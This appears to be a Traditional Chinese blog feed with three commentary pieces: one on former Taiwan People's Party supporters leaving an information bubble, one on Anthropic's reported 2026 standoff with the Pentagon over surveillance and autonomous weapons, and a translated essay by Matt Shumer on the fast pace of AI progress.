這個差別,不應該被輕易跳過。把脫北的前支持者定性為「贖罪者」,隱含的邏輯是:他們過去做了錯事。但更準確的描述是,他們進入了一個設計精良的資訊繭房,裡面的聲音被仔細篩選過——哪些媒體可信,哪些人的話一概不聽,哪些事件是政治追殺。在那個被嚴格管理的資訊環境裡做出的選擇,是在嚴重受限的視野下做出的選擇,而不是惡意。

太太說:「很多民眾黨支持者只是被蒙在鼓裡,但是一樣愛台灣。我們都是正在努力保護台灣的同胞,只是他們被騙了而已。」

同時,先生也提出了一個台派不太喜歡聽的觀察:台派自己也有資訊繭房。有些台派習慣直接封鎖不同聲音,避免接觸讓自己不舒服的言論,這同樣是在為自己建牆。他說,中共希望的,正是兩邊都繼續縮在自己的繭房裡,互相不說話,彼此妖魔化——分化,是他們最想看到的結果。

醒來之後,先生看見的,也許比多數台派還要更清晰。

回到目錄


去脈絡化:一個值得認識的政治技術

訪談裡,先生和太太多次提到一個現象:民眾黨支持者被反覆訓練成去脈絡化的閱讀方式。一段話只留兩個字,一支影片只剪五秒,然後讓這個片段代替整個事件的意義。這不是個人問題,它是一種被系統性投餵和強化的閱讀習慣。

當一個人被長期訓練成只接受碎片,完整的脈絡反而會讓他感到陌生,甚至懷疑。

然而,單一故事,永遠有危險。近期有個時事例子,把這個現象呈現得相當清楚。

2026 年 3 月 13 日,民眾黨陳智菡在記者會上,針對日本神戶市議員上畠寬弘反對柯文哲入境日本一事,公開表示「無罪推定」是民主國家有法律素養的人應有的見解,言下之意是日本議員不懂。上畠寬弘隨即回應:柯文哲能否出境是台灣方面的判斷,但他出境後要前往哪個國家,則應由接收國依其自身立場判斷,「因此,日本基於自身立場與國家利益來判斷是否允許入境,這是極為正常且理所當然的做法。」

陳智菡的論述,是一個非常典型的去脈絡化操作。

「無罪推定」是一刑事訴訟基本原則,在無合理可疑的證據提出前,被都應視為無罪的原則。這個原則規範的是司法程序「內」的處置方式 ——也正因如此,即使在無罪推定的原則下,法院仍然可以對被告戴上腳鐐、收押看守所、限制出境,因為這些是基於逃亡風險的預防性措施,而非基於「他有罪」的懲罰。

把「無罪推定」無限上綱到「因此任何主權國家都不得拒絕柯文哲 —一個應該被無罪推定的受審人— 入境」,這是把一個法律原則從它的適用脈絡中強行拉出來,貼到一個它本來不適用的場域。

回到目錄


台派的自我檢視:張開手,而不是握緊拳

這集訪談對台派而言,是一個難得的參照。

它讓台派看見,曾經支持民眾黨的人是如何一步一步走進那個繭房的。他們不是壞人,不是笨蛋,很多人甚至比台派更愛台灣,只是所接收到的資訊被系統性地控制。這個理解,應該影響台派面對這些人的方式。

台派自身也有一個習慣性的衝動:當一個前民眾黨支持者出現,第一個反應往往不是張開手,而是握緊拳——用「你們就是害台灣變成這樣」的邏輯,把對方推回去。這種反應在情感上完全可以理解,但在效果上,它卻成為那個還在繭房邊緣猶豫的人,更難跨出那一步的理由

訪談裡有一個細節。先生在 Threads 上發出那支自白影片,測試台派反應的時候,台派的溫暖出乎他意料。那個意外,本身就說明了很多事情——那個溫暖讓他的轉變走得更順,因為它告訴他:出來不需要付出被嘲笑的代價。

回頭的成本,很低。

沒有人會因為被鐵拳打醒而感謝那隻手。他們唯一可能出來的路徑,是當清醒的代價比持續留在裡面更低的時候。台派能做的,是讓那扇門保持敞開,讓踏出來的人感覺那一步值得走。他們需要的是一個讓他們有空間重新思考的環境——而那個環境,是台派可以主動創造的。

回到目錄


台灣人的手,永遠為大家開著

先生在節目最後說:「台灣是民主社會,你隨時可以改變立場,不需要被貼上背叛者的標籤。可以多去聽聽國外的聲音,看看外面怎麼看台灣現在的處境。隨便找到一個 (聲音),全盤就會 (開始改變)。」 括號內文字為作者依句意自行加上,原訪談沒有

太太說:「很多民眾黨支持者只是被蒙在鼓裡,但是一樣愛台灣。正在努力保護台灣的人,都是我們的同胞,只是他們被騙了而已。」

台灣的韌性,從來不是建立在大家都想法一致。它建立在即使不一致,還是能夠在同一個民主框架下共存、對話、說服彼此、讓最佳的意見勝出。那個框架值得被守護,而守護它最有力的方式,是讓進來的門永遠開著。

#politics #psychology

回到目錄


本文整理自宵夜鏡來講節目訪談「脫北者夫妻」,並加入作者評析。


後記:關於這集節目本身

這集訪談值得看,但也有一些小遺憾。

主持人打斷來賓的次數稍多。有幾個時刻,先生或太太正要把想法說到深處,話被接走了。對訪談類節目來說,讓受訪者把話說完往往比主持人的即時反應更重要,因為那些完整的話,才是節目最核心的價值所在。

節目維持了一個相對輕鬆的氛圍,這本身沒有問題,甚至是必要的——沉重的議題需要呼吸的空間。但輕鬆與流於粗俗之間是一條線,這集偶爾有些踩線的時刻,在討論本身相當有重量的主題時,反差讓人稍微出戲。

還有一個更細微、也更值得被點名的地方:主持人對先生的幾個細節,有時會流露出一絲帶著善意的調侃,例如當年加入民眾黨、填上「賴清德」作為介紹人的那個故事。主持人的笑,確實是善意的,但這也是一個提醒:即便是立場清晰、能力很強的台派,面對回頭的朋友,也不是完全沒有「你看,你那時候多傻」的優越感存在。

這種優越感,哪怕只是一瞬間、哪怕是完全出於善意,對一個還在猶豫要不要走出來的人來說,可能就是那道讓他打退堂鼓的笑。沒有人願意把清醒的代價設定為「被當成過去的笑話展示」。

提出這些,不是要否定這集節目的價值——它的價值是真實的,訪談也很真誠。只是如果台派想要認真地把這件事做得更好,細節魔鬼也得注意。

回到目錄


附註

附註一:為什麼繭房容易製造陰謀論思維

先生在訪談中描述的那種世界觀——司法被控,媒體被收,所有不利的訊息都是政治追殺——是一種典型的陰謀論結構。這種思維模式在資訊繭房裡特別容易被強化,因為繭房的機制本來就是在提供「解釋一切的答案」。

理解這個現象,有一個很有用的Mental Model,叫做奧卡姆剃刀(Occam's Razor)。它的核心想法是:如果兩個解釋都能說明同一件事,通常應優先選擇假設較少的那個。每增加一個假設,就增加一個可能出錯的地方,整個解釋(陰謀論)成立的機率也因此下降。

陰謀論之所以通常站不住腳,正是因為它需要一整串彼此依賴的假設才能成立

普通解釋:公民團體認為這些立委的表現不符選民期待 → 發起罷免。

陰謀論版本:民進黨策劃 → 動員側翼 → 收買媒體報導 → 假裝是公民發起罷免 → 目的是消滅反對黨 → 建立獨裁

後者的每一個假設都需要獨立成立,只要其中任何一個是錯的,整個解釋就會崩塌。但在繭房裡,這些假設早已被預先植入,彼此互相支撐,看起來渾然一體。

這也解釋了為什麼清醒往往需要一個「外部的第三方」:在繭房內部,沒有任何聲音能夠挑戰那些假設;只有當一個完全不在這個敵我框架裡的聲音出現,人才有機會退一步,問自己:我這個解釋,到底需要多少假設才能成立?

回到目錄


台灣加油,我們都是Team Taiwan


 
Read more...

from 東方琉璃淨土

AI 監控的戰線,早就越過你我以為的邊界。

2026 年 2 月底,美伊戰爭剛剛開打的那個星期。

美國國防部長 Pete Hegseth 下了最後通牒:美國公司 Anthropic 若不在週五下午 5 點 01 分前讓步,將被打上「供應鏈風險」的標籤——這個標籤,向來只貼在中國企業或俄羅斯企業身上。

Anthropic CEO Dario Amodei 沒有讓步。


目錄


一家公司,一個宣言

Amodei 後來在 CBS 的訪問裡說了這樣一段話:

「我們是愛國的美國人。我們所做的一切,都是為了這個國家,為了支持美國的國家安全。不同意政府的決定,是世界上最美國的事情之一。我們是愛國者。」

這不只是一場商業上的對峙。這是一條關於 AI 時代、公民自由與國家權力邊界在哪裡的宣言。

有人說,這件事的重要程度,不亞於正在中東燃燒的那場戰爭。

說這話的人沒有在誇大。那場戰爭打完了,世界照樣運轉。但這場衝突的走向,將決定在 AI 時代裡,民主體制的骨架究竟還剩多少。

回到目錄


事件時間軸

這場衝突走得很快。

2021 年,Dario Amodei 和幾位前 OpenAI 研究員,因為對 AI 安全的深切憂慮而出走,創立了 Anthropic。他們的立場從一開始就很清楚:AI 若不謹慎建造,人類文明將付出無法挽回的代價。

幾年之後,Anthropic 卻成了第一家將模型部署進美軍機密雲端的 AI 企業。他們在情報體系和軍事任務支援上的合作程度,遠超過多數同業。Anthropic 從來不是反軍事的公司——他們真心相信,美國需要 AI 優勢來抗衡威權體制,尤其是中國。

問題出在 2026 年初。

五角大廈要求取得 Claude 在「所有合法用途」下的完整使用授權,其中包含兩件 Anthropic 明確說不的事:大規模國內監控,以及完全自主武器(不需要任何人類介入就能開火的系統)。

2 月 26 日,Anthropic 正式拒絕。

2 月 27 日,Hegseth 宣布禁令。幾個小時後,川普在社群平台公開砲轟 Anthropic,要求所有政府機構立即停用 Claude。同一天,美軍對伊朗發動空襲。

OpenAI 的 Sam Altman 則在當天稍晚宣布,OpenAI 已和五角大廈達成協議。

3 月 9 日,Anthropic 向加州聯邦法院提告,稱政府行動「前所未有且違法」,並主張政府此舉侵犯了公司的言論自由與正當程序權利。

3 月 10 日,微軟向法院提交文件,公開聲援 Anthropic,要求法院頒布臨時限制令,阻止禁令正式生效。

回到目錄


Anthropic 到底在拒絕什麼

值得停下來想清楚這件事,因為很容易被政治噪音淹沒。

Anthropic 並不是在拒絕和軍方合作。他們已經在做,而且做得比所有 AI 企業都更深。Amodei 在 CBS 的訪問裡說得很直接:「我們對國防部所有用途都 OK,基本上是 98% 或 99% 的用途,除了我們擔憂的兩件事。」

第一件事,大規模國內監控。五角大廈要求的是「所有合法用途」。但 Amodei 的解釋是,問題恰恰出在「合法」這兩個字上——有一種監控行為,在技術上沒有違法,是因為法律壓根還沒有追上技術的步伐。從私人企業購買的零散個人資料,透過 AI 拼接成對每位公民的完整追蹤檔案,這件事在 AI 問世之前根本辦不到,所以法律從來沒有被設計來阻止它

「技術發展的速度,超前了法律。」

第二件事,完全自主武器——不需要任何人類參與就能自行開火的武器系統。Amodei 說,今天的 AI 模型根本還沒有可靠到足以承擔這種責任。他在訪問裡說:「任何真正和 AI 模型合作過的人都知道,它存在一種根本的不可預測性,是我們在技術上還沒有解決的問題。」

五角大廈的立場是:這些事情都在法律允許範圍內,一家私人公司沒有資格在這裡劃線。

Anthropic 的立場是:他們不是要替軍方拍板決策,他們只是不願意在法律還沒趕上技術之前,成為讓那些重大決策得以執行的底層工具。

回到目錄


中國的影子:那 2.4 萬個假帳號

要理解 Anthropic 在這場衝突裡的位置,必須先看另一件事。

2026 年 2 月,Anthropic 公開指控三家中國 AI 公司——DeepSeek、Moonshot AI 與 MiniMax——利用超過 2.4 萬個假帳號,對 Claude 發動了超過 1,600 萬次互動,採用一種叫「蒸餾(distillation)」的技術,系統性地竊取 Claude 的核心能力,鎖定目標包括代理式推理、工具使用和程式編碼。

Anthropic 追蹤到 DeepSeek 超過 15 萬次的互動,其中有一個格外令人不安的細節:他們的目標之一,是讓模型學會對政治敏感問題給出「符合中國審查要求的安全替代回應」。這不只是技術層面的抄襲,他們還在訓練模型吸收威權審查的思維邏輯。

Anthropic 在公開聲明中指出,透過非法蒸餾建立的模型,很可能無法保留原本的安全防護機制——這意味著危險能力可能在幾乎沒有任何保護的情況下對外擴散。

公司因此呼籲進一步收緊對中國的 AI 晶片出口管制。Amodei 更早在達沃斯公開說,向中國出售高階 AI 晶片就像「把核武賣給北韓」。

這是一家在對中國 AI 威脅的判斷上,立場和美國國家利益高度咬合的公司。把這一點和它在五角大廈議題上的立場擺在一起,浮現出的是一幅完整的圖像:Anthropic 不是反政府,也不是反軍方,它反對的是讓 AI 在沒有任何人類監督的前提下被用來對付人類——不論那個對象是境外敵人,還是本國公民。

回到目錄


科技跑在法律前面:我們該怎麼辦?

這場衝突有一個深層問題,是所有討論都在迴避的:

如果技術發展的速度永遠快過法律,那誰來填補那個空白?

《The Coming Wave》 的作者 Mustafa Suleyman,是 Google DeepMind 的共同創辦人,也是當今最具影響力的 AI 思想家之一。他在書中提出了一個他稱之為「圍堵(containment)」的核心命題:AI 的擴散速度已經徹底超越了任何現有治理機制的承載能力,而我們面對這道難題,其實只有三條路可走,但每一條都要付出代價。

一是放慢科技本身的速度。先暫停開發,等法律和監管追上來。代價是:中國不會跟著暫停,美國若單方面踩煞車,競爭優勢就會滑向威權體制那一邊。

二是讓企業自主控管。由 AI 公司各自設定使用限制,也就是 Anthropic 現在正在做的事。代價是:一家沒有民選授權的私人公司,憑什麼做出這些牽動深遠的決定?Palmer Luckey 稱之為「企業威權主義」,這個說法並非毫無根據。

三是加速立法跟上。由民選機構以最快速度建立新的法律框架,讓政府的 AI 使用行為受到明確的司法授權和國會監督。這是三條路裡最理想的一條,也是短期內最難走通的——美國國會通過一部重要的科技立法,往往需要幾年,甚至幾十年。

Amodei 在 CBS 的訪問裡也談到了這個困境。他說,大規模 AI 監控之所以算合法,「不是因為法律允許,而是因為法律還不知道這件事的存在。技術的發展超前了法律的步伐。」

這不是 Anthropic 獨有的處境。這是整個 AI 時代共同面對的困境。

在法律跟上之前,某個地方必須有人站著,說「這件事等一下」。目前,Anthropic 選擇站在那個位置。這是一個有代價的選擇——財務上、政治上,代價都是真實的。但如果沒有任何人站在那個位置,空白期間會發生什麼事,不需要太豐富的想像力就能描繪出來。

回到目錄


Ben Thompson 的冷靜分析:核武隱喻

長居台灣的科技評論家 Ben Thompson,是全球最受推崇的科技產業分析師之一。他的訂閱電子報 Stratechery 在矽谷有著相當份量的影響力。在台灣生活的經歷,讓他對民主社會如何在威權壓力下保持韌性,有著格外貼身的理解。

他在〈Anthropic and Alignment〉一文中,提出了一個殘酷而清醒的分析框架。

他從美伊戰爭切入,指出國際法之所以有效,根本原因不在道義,而在是否有力量執行——沒有超國家的強制機制,「誰違法」這個問題的答案,終究由誰更強來決定。力量(might)才是最後的裁決者。

接著他把這個邏輯投射到 AI 上:如果 AI 的戰略價值真的接近核武等級,那它實質上將重塑全球的權力格局。而一項具備這種分量的技術,不可能長期讓一家未經選舉的私人公司握有最終裁量權。

Thompson 也點出了 Amodei 論述裡的一個內在張力:Amodei 自己說過「向中國出售高階 AI 晶片如同把核武賣給北韓」——若他真的認為 AI 等同核武,那美國政府又為何會長期容許一家私人公司掌有這等戰略資產的最終決定權?

他給出的結論近乎二選一:Anthropic 要不接受從屬於國家決策框架的位置,要不就得承受政府透過法律或更強硬手段來削弱其獨立性的壓力。

Thompson 並不是在替五角大廈辯護。他指出 Anthropic 對監控問題的憂慮,在法律層面確實站得住腳,只是解決方式應該是推動立法,而不是讓一家公司單方面畫紅線。

這是一個清醒的分析。它暗示的是:即使 Anthropic 的判斷是對的,它選擇的應對方式也可能埋下更大的問題。但在更好的方式出現之前,這個選擇依然需要有人做出來。

回到目錄


Anduril CEO 的另一面:民主是誰說了算?

Anduril 是美國最舉足輕重的國防科技新創之一,核心業務涵蓋無人機、反無人機系統與 AI 武器平台。創辦人 Palmer Luckey 在這場衝突中的立場毫不含糊——他站在五角大廈那一邊。

他說了這樣一句話:「任何說國防企業應該超越法律、超越立法者和民選領袖來決定合作對象的人,你等於是在說你不相信這個民主實驗,你想要的是一種『企業威權主義』。」

這個論點有其說服力。在民主社會,軍事能力的動用授權本來就應該屬於民選政府,而不是由科技公司的 CEO 替選民做決定。如果讓私人企業來決定哪些武器可以製造、哪些技術可以部署,反而是一種隱性的去民主化。

但這個論點有一個它自己始終沒有回答的問題:

「合法」的邊界,是誰畫的?

如果民選政府的決定是「允許 AI 在沒有司法授權的情況下追蹤所有公民」,而這件事之所以合法,只是因為法律還沒有來得及把它列為違法——那這個「由人民決定」的民主程序,到底在保護誰的自由?

Anthropic 的立場不是「我們比政府更懂」,而是「在法律趕上技術之前,我們不願意成為填補那段空白的工具」。這兩個立場之間的距離,比表面上看起來的要遠得多。

回到目錄


OpenAI 的決定,以及一個人的辭職

五角大廈宣布對 Anthropic 祭出禁令的幾個小時後,Sam Altman 宣布:OpenAI 已和國防部達成協議,允許其 AI 模型部署於機密網路之中。

時機過於完美,讓很多人感到不舒服。

Altman 後來在 X 上坦承,這件事看起來「投機而且草率(opportunistic and sloppy)」,並說公司「不應該這樣倉促」。

OpenAI 隨後修改了協議內容,加入了禁止大規模國內監控的條款——措辭和 Anthropic 最初堅持的保護幾乎如出一轍。Altman 甚至在事後公開表示,他希望五角大廈能給 Anthropic 和 OpenAI 完全相同的合約條件。

但就在協議宣布後不久,OpenAI 機器人部門負責人 Caitlin Kalinowski 在 X 和 LinkedIn 上公開宣布辭職。

她在貼文裡寫道:「AI 在國家安全中確實扮演重要角色。但在沒有司法授權的情況下監控美國人,以及在沒有人類授權的情況下執行致命行動,是應該被更慎重討論的紅線,而這個決定沒有做到。這是關於原則,不是關於人。」

她說,她對 Altman 和整個 OpenAI 團隊仍懷有深深的敬意。問題不在人,在於這件事被決定得太快了。

這是 OpenAI 內部對五角大廈協議表達異議的最高層級聲音。當一家公司最資深的部門負責人之一,因為合約背後的倫理疑慮而選擇辭職,這件事本身已經說明了一些什麼。

回到目錄


微軟出手,商業代價已現

五角大廈的禁令所帶來的商業衝擊,不是假設性的。

Anthropic 財務長 Krishna Rao 在法庭文件中估算,若黑名單措施維持不變,公司 2026 年的營收可能蒸發「數十億美元」。原本預計全年超過 5 億美元的公部門年度經常性收入,可能大幅萎縮甚至歸零。目前已有超過 100 家企業客戶表達困惑、疑慮與觀望,一家年合約規模達數百萬美元的夥伴已轉向競爭對手,另有多筆總計逾億美元的金融業合作計畫被迫中止。

3 月 10 日,微軟向法院提交文件,聲援 Anthropic 的訴訟,要求法院頒布臨時限制令,阻止禁令正式生效。

微軟的論點耐人尋味。文件中警告:若禁令持續,公司及其他科技企業可能被迫「立即調整目前與國防部相關的產品與合約配置」,而這「可能在關鍵時刻削弱美軍的作戰能力」。

五角大廈以「國家安全」為由封殺 Anthropic,微軟卻用同樣的「國家安全」邏輯,反過來主張封殺本身才是對國家安全的真正威脅。

與此同時,科技業已有近 900 名工程師聯署,其中包含約 800 名 Google 員工和近 100 名 OpenAI 員工,公開反對軍方對 Anthropic 的行動,並呼籲國防部撤回「供應鏈風險」的認定。

這場衝突早就不只是 Anthropic 一家公司的事了。

回到目錄


Anthropic 是愛國企業嗎?

這個問題的答案,取決於你怎麼定義「愛國」。

如果愛國意味著服從政府的每一道命令,那 Anthropic 不是。

如果愛國意味著守護這個國家建立時所依憑的價值——免於任意監控的自由,以及人類對致命武器的最終控制權——那 Anthropic 的立場,反而比任何人都更貼近那個定義的核心。

Anthropic 是第一家把 Claude 部署進美軍機密雲端的 AI 企業。他們在情報社群和軍事任務支援上的合作深度,超過了絕大多數同業。他們公開指控中國 AI 公司竊取技術,呼籲收緊晶片出口管制,明確將中國的 AI 擴張定性為民主世界所面臨的系統性威脅。

他們的立場不是「AI 不應該用於軍事」,而是「AI 不應該在缺乏監督的情況下被用來對付美國自己的公民」。這兩個句子之間,有一道非常寬的鴻溝。

Amodei 在 CBS 訪問最後說:「不同意政府的決定,是世界上最美國的事情之一。我們在這件事上的每一個選擇,都是為了這個國家的價值而站立。」

中國不需要 AI 安全護欄,因為它的政治體制本來就建立在監控和管控之上。而如果美國為了追求軍事效率,把 AI 的安全護欄逐一拆除,美國與中國之間的制度差異,就會從內部開始縮小。

這正是 Anthropic 不願退讓的核心邏輯。若這個邏輯成立,那它的重要性——對民主體制能否長遠存活而言——不亞於任何一場以槍砲打響的戰爭。

回到目錄


戰場之外的戰場

美伊戰爭佔據了所有的頭條。飛彈、油輪、空襲、油價。這些都是看得見的衝突。

但有一場戰爭正在視線之外進行,它的戰場是 AI 模型的使用條款,是聯邦法院的訴狀,是一封 1,500 萬人看過的辭職信,是近 900 名工程師的連署,是一家公司選擇在巨大的商業壓力面前不讓步。

你可以不同意 Anthropic 的做法。你可以認為 Palmer Luckey 說得有道理,私人公司不應該凌駕民選政府做出這類決定。你可以認為 Ben Thompson 是對的,AI 的戰略分量讓國家控制權不可避免。

這些都是值得認真面對的立場。

但有一件事是確定的:在 AI 技術已經能夠建立從未有過的監控能力、而法律還沒有跟上的這段空白期間,某個地方必須有人站著說「等一下,我們還沒有談清楚這件事」。

那個人,或那家公司,會付出代價。Anthropic 正在付出它的代價。

我們還沒有想清楚的問題是:

在法律終於跟上技術之前,那個代價應該由誰來承擔?承擔它的,算不算是一種愛國?

還有一個更安靜的問題,在所有新聞的喧嚷過去之後,值得獨自坐著想一想:

當一個社會決定讓 AI 在法律灰色地帶運作,它所付出的,是哪一種自由?


本文綜合整理自 CBS News(Dario Amodei 專訪逐字稿)、鉅亨網、ABMedia、TechNews、中央社、Ben Thompson(Stratechery《Anthropic and Alignment》)等媒體報導與分析文章。


#ai #anthropic #democracy #pentagon #tech

 
Read more...

from 東方琉璃淨土

AI很重要,但是像葉修這樣的人,使用AI不當可能會發生AI Brain Fry

很多人從「某些事情是安全的」這個概念中尋找安慰——AI 可以處理日常工作,但無法取代人類的判斷力、創造力、戰略思維、同理心。

我以前也這麼說。

我不確定我現在還相信這一點。


作者:Matt Shumer,2026 年 2 月 9 日

回想一下 2020 年 2 月。

如果你當時特別留意,也許你注意到有幾個人在談論一種在海外蔓延的病毒。但大多數人並沒有特別留意。股市表現很好,你的孩子在上學,你照常去餐廳、握手、規劃旅行。如果有人告訴你他在囤積衛生紙,你大概會覺得他在網路的奇怪角落待太久了。然後,在大約三週內,整個世界翻天覆地。你的辦公室關閉了,孩子回到家,生活變成了一個月前的你絕對不會相信的模樣。 我認為,我們現在正處在一件遠比新冠肺炎大得多的事情的「感覺小題大作」階段。

我在 AI 新創公司工作了六年,也在這個領域進行投資。我活在這個世界裡。而我寫這篇文章,是為了我生命中那些不活在這個世界裡的人——我的家人、朋友,以及那些一直問我「AI 到底是怎麼回事?」卻得不到足以反映真實情況的答案的人。我一直給他們的是那個客套版本,那個雞尾酒派對版本。因為誠實的版本聽起來像我瘋了。有一段時間,我告訴自己這是一個足夠好的理由,讓我把真正發生的事藏在心底。但我說的話與真實發生的事之間的落差,已經大到無法忽視了。我在乎的人值得聽到即將到來的事,即使它聽起來很瘋狂。

我要先說清楚一件事:儘管我在 AI 領域工作,我對即將發生的事幾乎沒有任何影響力,業界絕大多數人也一樣。未來正在被少數人塑造:幾間公司裡幾百名研究人員——OpenAI、Anthropic、Google DeepMind,以及少數幾家。一個由小團隊在幾個月內管理的訓練過程,就可以產出一個改變整個技術走向的 AI 系統。我們這些在 AI 領域工作的人,大多數都是在我們沒有奠定的基礎上進行建設。我們和你一樣在旁觀這一切——只是我們碰巧離得夠近,能先感受到地面的震動。

但現在是時候了。不是那種「最終我們應該談談這件事」的方式,而是「這正在發生,我需要你理解它」的方式。


我知道這是真的,因為它先發生在我身上

科技圈以外的人尚未完全理解的事情是:為什麼業界這麼多人現在都在發出警報——因為這已經發生在我們自己身上了。我們不是在預測。我們在告訴你,這在我們自己的工作中已經發生,並警告你:你是下一個。

多年來,AI 一直在穩定進步,偶爾有大躍進,但每次躍進之間的間隔都足夠長,讓你能夠消化。然後在 2025 年,新的模型訓練技術解鎖了更快的進步速度。然後更快。再更快。每一個新模型不只是比上一個更好——進步的幅度更大,新模型的發布間隔也更短。我越來越多地使用 AI,與它來回的次數越來越少,看著它處理我曾經認為需要我專業知識的事情。

然後,在 2 月 5 日,兩個主要的 AI 實驗室在同一天發布了新模型:OpenAI 的 GPT-5.3 Codex,以及 Anthropic 的 Opus 4.6(Claude 的製造商,ChatGPT 的主要競爭者之一)。有什麼東西「喀嚓」了一聲。不像一個開關被打開——更像是當你意識到水一直在你周圍上漲,現在已經到了你胸口的那一刻。

我在工作中實際的技術工作上已不再被需要了。 我用普通英文描述我想要建構的東西,它就……出現了。不是我需要修改的草稿,而是完成品。我告訴 AI 我想要什麼,離開電腦四個小時,回來發現工作已完成。完成得很好,比我自己做的還好,無需修改。幾個月前,我還在與 AI 來回溝通、引導它、做修改。現在我只需要描述結果然後離開。

讓我舉個例子,讓你了解這在實踐中的樣子。我會告訴 AI:「我想建立這個應用程式,以下是它應該做的事,大致上應該長這樣,把使用者流程、設計都搞定。」然後它就會去做。它寫了數萬行程式碼。然後,這是一年前無法想像的部分——它自己打開這個應用程式,點擊按鈕,測試功能,像人一樣使用這個應用程式。如果它不滿意某個地方的外觀或感覺,它自己回去修改,獨立迭代、修復和完善,直到滿意為止。只有當它決定這個應用程式達到它自己的標準後,才回來對我說:「可以讓你測試了。」而當我測試它時,通常是完美的。

我沒有誇大。這就是我本週一的工作樣貌。

但最讓我震撼的是上週發布的模型(GPT-5.3 Codex)。它不只是在執行我的指令,它在做出有智慧的決策。它第一次有了感覺像是判斷力的東西,有了品味——那種無法言說的、知道什麼是正確決定的感覺,是人們一直說 AI 永遠不會擁有的東西。這個模型擁有它,或者說足夠接近,以至於這個區別開始變得不那麼重要了。

我一直是 AI 工具的早期採用者,但過去幾個月震驚了我。這些新的 AI 模型不是漸進式的改進,這是完全不同的事物。

這就是為什麼這件事對你也很重要,即使你不在科技業。

AI 實驗室做了一個刻意的選擇:他們首先專注於讓 AI 擅長寫程式碼——因為建構 AI 本身需要大量程式碼。如果 AI 能寫那些程式碼,它就能幫助建構下一個版本的自己,而那個更聰明的版本可以寫出更好的程式碼,進而建構出更聰明的版本。讓 AI 擅長寫程式,是解鎖一切的策略。這就是為什麼他們先做這件事。我的工作比你的工作更早開始改變,不是因為他們針對軟體工程師——這只是他們選擇先瞄準的方向的副作用。

他們現在已經完成了。他們正在轉向其他一切。

科技工作者在過去一年所經歷的,看著 AI 從「有用的工具」變成「比我更擅長做我的工作」,就是其他每個人即將要經歷的。法律、金融、醫學、會計、顧問、寫作、設計、分析、客戶服務。不是十年後。建構這些系統的人說是一到五年。有些人說更短。而以我在過去幾個月看到的情況,我認為「更短」更有可能。


「但我試過 AI,它沒那麼好用」

我常聽到這句話,我理解,因為這曾經是真的。

如果你在 2023 年或 2024 年初試過 ChatGPT,覺得「它會捏造資訊」或「沒什麼印象深刻」,你是對的。那些早期版本確實有侷限,它們會自信地說出一些胡說八道的話。

那是兩年前的事了。以 AI 的時間尺度來說,那是遠古時代。

今天可用的模型,與六個月前的相比已是面目全非。關於 AI 是否「真的在進步」或「撞牆了」的爭論,那個持續超過一年的爭論,結束了。誰還在做那種論斷,要麼是沒有使用過當前的模型,要麼是有動機去淡化正在發生的事,要麼是基於 2024 年的體驗來評估,而那已不再相關。公眾認知與當前現實之間的鴻溝是巨大的,而這個鴻溝是危險的——因為它阻止人們做好準備。

問題的一部分是大多數人在使用免費版本的 AI 工具。免費版本比付費用戶能使用的東西落後超過一年。以免費版 ChatGPT 來評判 AI,就像用折疊式手機來評估智慧型手機的現狀。每天真正把頂尖工具用於實際工作的付費用戶,知道接下來會發生什麼。

我想到我的一位律師朋友,我一直告訴他在事務所嘗試使用 AI,他一直找理由說行不通——它不是為他的專業領域建構的、測試時出了錯、它不理解他工作的細微之處。我理解。但我已經有大型律師事務所的合夥人聯繫我尋求建議,因為他們試過了當前版本,看到了這將走向何方。其中一位大型事務所的管理合夥人,每天花幾個小時使用 AI。他告訴我,這就像有一個隨時可以立即調度的助理團隊。他不是因為它是玩具才用它,他用它是因為它有用。他告訴我一句讓我念念不忘的話:每隔幾個月,它在他工作上的能力就會顯著提升。他說如果它保持這個軌跡,他預計在不久後它就能完成他所做的大部分事情——而他是一位有幾十年經驗的管理合夥人。他沒有恐慌,但他非常密切地關注著。

那些在業界領先的人(那些真正認真嘗試的人),並沒有輕視這件事,他們被它已經能做到的事情震驚,並據此調整好自己的位置。


這一切進展有多快

讓我把進步的速度說得具體一點,因為如果你沒有密切追蹤,這是最難相信的部分。 2022 年,AI 連基本的算術都無法可靠地完成,它會自信地告訴你 7 × 8 = 54。 到了 2023 年,它可以通過律師考試。 到了 2024 年,它可以寫出可運行的軟體,並解釋研究所等級的科學知識。 到了 2025 年底,世界上一些最優秀的工程師表示,他們已將大部分程式碼編寫工作交給了 AI。

2026 年 2 月 5 日,新的模型出現了,讓之前的一切感覺像是另一個時代。

如果你已有幾個月沒有嘗試 AI,今天存在的東西對你來說將會難以辨認。

有一個叫做 METR 的組織實際上用數據衡量這一點。他們追蹤一個模型在沒有人類幫助的情況下,能夠端到端成功完成的真實世界任務的時長(以人類專家完成該任務所需的時間來衡量)。大約一年前,答案大概是十分鐘,然後是一個小時,然後是幾個小時。最近的測量(2025 年 11 月的 Claude Opus 4.5)顯示,AI 能夠完成需要人類專家將近五個小時才能完成的任務。而這個數字大約每七個月翻一番,最新數據表明它可能正在加速到每四個月翻一番。

即使是這個測量,也尚未更新納入本週才剛出現的模型。根據我的使用體驗,這次躍進是極其顯著的。我預計 METR 圖表的下一次更新將顯示另一個重大飛躍。

如果你延伸這個趨勢(它已持續多年,沒有趨緩的跡象),我們看到的是:在不到一年內,AI 將能夠獨立工作數天;兩年內,數週;三年內,可以處理長達一個月的專案。

Amodei 說,「在幾乎所有任務上都大幅優於幾乎所有人類的 AI 模型」,有望在 2026 或 2027 年實現。

讓這件事沉澱一下。如果 AI 比大多數博士更聰明,你真的認為它做不到大多數辦公室工作嗎? 想想這對你的工作意味著什麼。


AI 正在建構下一個 AI

還有一件事正在發生,我認為這是最重要的發展,也是最不被理解的。

2 月 5 日,OpenAI 發布了 GPT-5.3 Codex。在技術文件中,他們寫道:

「GPT-5.3-Codex 是我們第一個在創建自身方面發揮了重要作用的模型。Codex 團隊使用早期版本來調試自身的訓練、管理自身的部署,並診斷測試結果和評估。」

再讀一遍。這個 AI 幫助建構了自己。

這不是對某天可能發生的事情的預測。這是 OpenAI 現在告訴你,他們剛剛發布的 AI 被用來創建自身。讓 AI 變得更好的主要因素之一,是應用於 AI 開發的智慧。而 AI 現在已足夠聰明,可以有意義地貢獻於自身的改進。

Anthropic 的 CEO Dario Amodei 說,AI 現在正在為他的公司編寫「大量程式碼」,當前 AI 與下一代 AI 之間的回饋循環正在「逐月加速」。他說我們可能「距離當前這代 AI 自主建構下一代的時間點只有一到兩年」。

每一代都幫助建構下一代,下一代更聰明,更快地建構下一代,而那個更聰明的版本繼續這個循環。研究人員稱之為「智慧爆炸」。而那些最清楚的人——正在建構它的人——相信這個過程已經開始了。


